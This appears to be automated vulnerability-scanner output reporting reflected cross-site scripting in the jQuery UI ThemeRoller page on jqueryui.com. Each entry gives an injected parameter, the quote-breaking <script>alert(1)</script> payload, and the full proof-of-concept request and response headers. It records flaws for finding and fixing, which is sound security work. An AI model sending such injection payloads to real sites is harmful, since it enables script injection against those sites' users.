The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa33"><script>alert(1)</script>92ca4dfbc3d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png5fa33"><script>alert(1)</script>92ca4dfbc3d&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120029
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcec"><script>alert(1)</script>f1da83410 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png3fcec"><script>alert(1)</script>f1da83410&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120025
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ed7"><script>alert(1)</script>5c3a54a40b7 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png25ed7"><script>alert(1)</script>5c3a54a40b7&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120029
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93619"><script>alert(1)</script>db84fe6e96f was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png93619"><script>alert(1)</script>db84fe6e96f&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120029
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33ed5"><script>alert(1)</script>35d4c5ff8a was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png33ed5"><script>alert(1)</script>35d4c5ff8a&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120027
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fad"><script>alert(1)</script>436b3b12950 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F37fad"><script>alert(1)</script>436b3b12950&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac137"><script>alert(1)</script>af50a204ab8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260Fac137"><script>alert(1)</script>af50a204ab8&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b43b"><script>alert(1)</script>221887cbb13 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F6b43b"><script>alert(1)</script>221887cbb13&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4547"><script>alert(1)</script>cf86ed9c393 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ad4547"><script>alert(1)</script>cf86ed9c393&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c1e"><script>alert(1)</script>0c7fc6ae90d was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260Fd3c1e"><script>alert(1)</script>0c7fc6ae90d&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97727"><script>alert(1)</script>83c0a5762c0 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa197727"><script>alert(1)</script>83c0a5762c0&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6d4"><script>alert(1)</script>c82fe09df08 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F5c6d4"><script>alert(1)</script>c82fe09df08&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb90d"><script>alert(1)</script>1fcf803181c was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxfb90d"><script>alert(1)</script>1fcf803181c&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
